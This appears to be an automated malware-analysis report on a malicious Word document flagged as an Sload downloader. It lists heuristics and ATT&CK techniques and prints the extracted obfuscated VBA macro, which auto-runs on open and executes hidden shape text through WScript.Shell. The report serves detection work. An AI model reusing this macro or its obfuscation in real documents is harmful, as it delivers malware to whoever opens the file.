Verdict: MALICIOUS
Risk Score: 212

Malware Insights

MITRE ATT&CK:
- T1059.001 PowerShell
- T1566.001 Spearphishing Attachment
The sample contains a VBA macro with a Document_Open auto-execution routine. This macro references PowerShell and appears to be designed to download and execute a second-stage payload. The ClamAV heuristic also flags it as a downloader. The embedded URL is benign, but the overall behavior indicates a malicious downloader.
Heuristics (8)

- ClamAV: Doc.Downloader.Sload-6784189-0 (critical) [CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Sload-6784189-0
- Reference to PowerShell (high) [SC_STR_POWERSHELL]: Reference to PowerShell
- VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code
- GetObject call (high) [OLE_VBA_GETOBJ]: GetObject call. Matched line in script: `End Select Set NsPfn = CVar(GetObject(raSQwZz + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + DJMQGi)) On Error Resume Next`
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low) [OLE_VBA_DOCOPEN]: Document_Open macro. Matched line in script: `Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next`
- Suspicious extracted artifact (info) [EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8741 bytes |

SHA-256: 4d4466144610cada7659c1b10fcf4c3a37a4a0326f380c5dd1bd67519877caaf

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 163 of 242 identifiers look randomly generated (e.g. 'iQPjqJZluLdVMM'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "wwGsdRiTitRA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
THqRRIR = (lErjh - Oct(uYEzbKjk) * pCMjl - Sgn(16254852) - 260192071 + Fix(GquiHX) + 2666806439# + 83717155 / 191528468 / wjBWsdjP)
Select Case lKOAui
Case 8241528
PEbfD = CLng(327157011)
ltnDmAPn = Int(amBETKjzW)
Case 279727785
Hrpzv = Hex(42446528)
ZIBEtlP = CStr(244271823 * CByte(pdcLVXQaH))
End Select
On Error Resume Next
sSDNRGz = (aFNhQtTnv - Oct(WqWrXbNZE) * PsAzzAsHM - Sgn(204164092) - 319555427 + Fix(oZMTh) + 3340498839# + 167978515 / 282218105 / HGcZpIB)
Select Case cArBIiiFO
Case 225239061
BLbQwS = CLng(11130410)
iEtOAOTHl = Int(ZJsqMki)
Case 30050527
jviOS = Hex(108810822)
pMjqj = CStr(43595956 * CByte(LXqilrnp))
End Select
On Error Resume Next
AqVDqqcor = (CicRJzGD - Oct(tmqDdCXwU) * GLzJihpHo - Sgn(319496806) - 260683907 + Fix(ANImohFr) + 579316999 + 214880629 / 327399344 / oHKnsA)
Select Case uHtlTD
Case 137091289
kTqRHGImd = CLng(304707626)
OpqdmZNiU = Int(XBPndtd)
Case 48158117
pjTjVXS = Hex(96778536)
OjVjtBmdD = CStr(198840084 * CByte(LFZAb))
End Select
Set aidNif = Shapes("iQPjqJZluLdVMM")
On Error Resume Next
iYlAiIL = (XJNcdYf - Oct(jWwawNz) * aKPmKKU - Sgn(123910447) - 61606490 + Fix(GaPRABH) + 2157307029# + 242642422 / 320404227 / IjcWMwS)
Select Case RXUYJZYsY
Case 108127464
ouTzRE = CLng(95301455)
VvSScD = Int(SanQzNCVs)
Case 39208205
CFrbIiQX = Hex(52535524)
okKRwdwC = CStr(332470948 * CByte(sVMGw))
End Select
adawQroJnVV = "" + wmZbtf + bumjB + aidNif.TextFrame.TextRange.Text + AujtkcDa + CPODn + MdpcwzkG + VLNqfP + dIcJTOjG
On Error Resume Next
oHzoSaz = (rbkMDBP - Oct(cZZizErJU) * muSDipp - Sgn(92693812) - 110138863 + Fix(bEQwYTGoj) + 556885949 + 119858494 / 91197670 / kHohL)
Select Case jQqUooC
Case 66674671
suWpkRPY = CLng(60822419)
FfwCZML = Int(lhwtHdn)
Case 216065219
kkbKVJSv = Hex(269677860)
cdrUjfHG = CStr(314115943 * CByte(NRIdQRcr))
End Select
On Error Resume Next
qtiwPqqqr = (iFkbq - Oct(NIhqU) * ElZWDmhA - Sgn(134343339) - 237637073 + Fix(izaDTt) + 3249287139# + 296835164 / 72784199 / pLTbpht)
Select Case rwmfCp
Case 294762921
tnEIqlw = CLng(290096239)
bQAuP = Int(wJLPaGvN)
Case 31353594
nclbzzkL = Hex(318322828)
KoCmD = CStr(85516992 * CByte(VORtScO))
End Select
On Error Resume Next
pzqbpw = (Nocnw - Oct(EjbBrzd) * ckDMibc - Sgn(171542524) - 104631097 + Fix(dEijH) + 522748789 + 282946129 / 270714741 / PqpTL)
Select Case tOjPIM
Case 296545055
wNPnPGXf = CLng(261784565)
SJruVYT = Int(CsOimQ)
Case 288333649
pMtKGzkVm = Hex(145268929)
UbiijDRAB = CStr(139310951 * CByte(tKvwKAUSa))
End Select
On Error Resume Next
jcCCw = (PVjwIsZ - Oct(kwkBCqk) * TYZzzFv - Sgn(304753296) - 73875961 + Fix(rViNCdBQd) + 251646219 + 186039893 / 262079247 / NZlQBcH)
Select Case iYJIidz
Case 199205996
aplLAD = CLng(283817342)
uHAmNju = Int(AMXNouRD)
Case 135984140
zUEXz = Hex(11123146)
SdnCLNVu = CStr(304156083 * CByte(VGpVr))
End Select
On Error Resume Next
QikmUKI = (MLkVfo - Oct(KijHV) * WRRJBRqP - Sgn(249797288) - 299529015 + Fix(ZhQwL) + 1029854079 + 161773699 / 105920874 / ucjMVq)
Select Case zuwBnzkt
Case 84095644
dStSwa = CLng(121071265)
wwYJzSIr = Int(rtiEn)
Case 77610053
qUnrOZwW = Hex(233423673)
mFWwwCRiZ = CStr(289140410 * CByte(qvftwv))
End Select
Set NsPfn = CVar(GetObject(raSQwZz + "new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + DJMQGi))
On Error Resume Next
dlUdjzYN = (kBXDduS - Oct(vUiTZDfO) * aNjQfsv - Sgn(43531282) - 175764035 + Fix(oQnjPRipX) + 3074713629# + 121768141 / 146901252 / zKjjz)
Select Case EipPNX
Case 76505284
EFIcwCv = CLng(194115602)
InOCqN = Int(TDDFm)
Case 35747075
LwoVQzBZI = Hex(27882334)
dkPSVTLT = CStr(307336241 * CByte(tkPNVhv))
End Select
On Error Resume Next
IpidYVwS = (pSXpRN - Oct(LPCrAn) * ENnvotdJ - Sgn(195765704) - 65589282 + Fix(lKjlL) + 1037909999 + 52096934 / 15158124 / wOrdzrSNK)
Select Case hhUGZ
Case 102480885
aHYkfoNo = CLng(208059800)
nZEmj = Int(ojqWJwwaQ)
Case 334958641
cTRDGV = Hex(168399726)
zdOTadoR = CStr(267033422 * CByte(nGXwjfWj))
End Select
On Error Resume Next
PPFGTAG = (CCroYHlcR - Oct(bjjupf) * KABdSzt - Sgn(108183540) - 142138094 + Fix(UfaCbq) + 1163874609 + 252767493 / 188406800 / zjkia)
Select Case mHurUZa
Case 186893514
AFSjF = CLng(332954720)
CtQzqIA = Int(RHMbjdQSC)
Case 305102302
lVitvE = Hex(330948637)
blzCXEZdr = CStr(118472605 * CByte(hiHEZMM))
End Select
On Error Resume Next
fLmqcNjlT = (nmqBhG - Oct(sMfiujEo) * RvQwZKd - Sgn(77023649) - 231621473 + Fix(LtkPHllZ) + 593149109 + 334259077 / 327432099 / BtYOLw)
Select Case kiiCD
Case 317880386
VVscIfRB = CLng(314170906)
IwXzIGvp = Int(DtXaKwh)
Case 28043249
CcrjTTQQh = Hex(210954918)
SvAziGOYK = CStr(182100737 * CByte(nMdsuzu))
End Select
Const LoILIjh = 0
On Error Resume Next
MDXqnEB = (cSDXRG - Oct(ADDuwXop) * UoihmDGUb - Sgn(253867418) - 8898535 + Fix(ZIkRibjKm) + 873724509 + 91872729 / 81739841 / qnlpGHYO)
Select Case WzaTZZM
Case 228557408
iEpavScQv = CLng(27969388)
HHaRzvP = Int(iVichv)
Case 249350477
rOCKwDRj = Hex(50579338)
PsTMqMUkV = CStr(100386613 * CByte(IUdJsDa))
End Select
On Error Resume Next
qmwhSKFm = (DHTsZFz - Oct(iWupQ) * pwitIzbjj - Sgn(173197247) - 102811358 + Fix(NuBNaf) + 3126261219# + 87883287 / 156542880 / AiiMabUr)
Select Case wavGj
Case 241393330
wpvTbt = CLng(187727218)
rEGRvO = Int(DSHwzOwWA)
Case 101520497
WToSnScJ = Hex(231470145)
REGGG = CStr(132161679 * CByte(VUDwoC))
End Select
On Error Resume Next
AYBUYpNF = (YTKzi - Oct(vJaifrK) * RPOflsci - Sgn(161735825) - 25622183 + Fix(lUHqmuTKP) + 204349129 + 222913343 / 71747254 / qYnHczhoq)
Select Case kFJKbMZp
Case 311483811
DzHnT = CLng(258582140)
LjuhjEUo = Int(FUGbWF)
Case 307935284
XkcjszpN = Hex(253771887)
qtRAn = CStr(270850718 * CByte(WHvHBB))
End Select
On Error Resume Next
Aspuc = (LXohiUiY - Oct(LJUqMSiA) * OTwOdfk - Sgn(25773318) - 250585282 + Fix(HDcKmEm) + 1645259199 + 277079623 / 309992720 / SfOvdVVY)
Select Case iRrOjI
Case 260939075
uJzaiJRhj = CLng(338168843)
lZtsFnvo = Int(TzJPfYpp)
Case 75022855
ddQpij = Hex(328797857)
kVzNuW = CStr(259295592 * CByte(npYmbkUF))
End Select
wlkCATv = Array(mXJVZ, NsPfn.Run!(adawQroJnVV, LoILIjh), oomfol)
On Error Resume Next
Mvkzsjvs = (cwIKUp - Oct(oAqmmLjG) * dBNMkqUv - Sgn(245866966) - 208076657 + Fix(JuuDVcS) + 2723210739# + 327930823 / 193828870 / ziMDfsQtB)
Select Case iTOhhj
Case 227417240
cMYoRVtG = CLng(255203515)
JsrICi = Int(jzhKb)
Case 205007588
iIfbjVovk = Hex(22401724)
RaLNrJZ = CStr(38403952 * CByte(jJYVRjfwj))
End Select
On Error Resume Next
BOOjIzvjw = (ziYCjcrnA - Oct(KUHIZuDvL) * ZRdMMWz - Sgn(112292077) - 244411253 + Fix(LrVQuLQqX) + 491438899 + 239855516 / 132042828 / jlhHGHOtA)
Select Case TZjEMpJ
Case 191462467
CFnTwqN = CLng(93142354)
NXDsFUz = Int(fPsJXBK)
Case 144687316
rOGDB = Hex(92871017)
KRrtSiR = CStr(294830216 * CByte(jfdRaULHm))
End Select
End Sub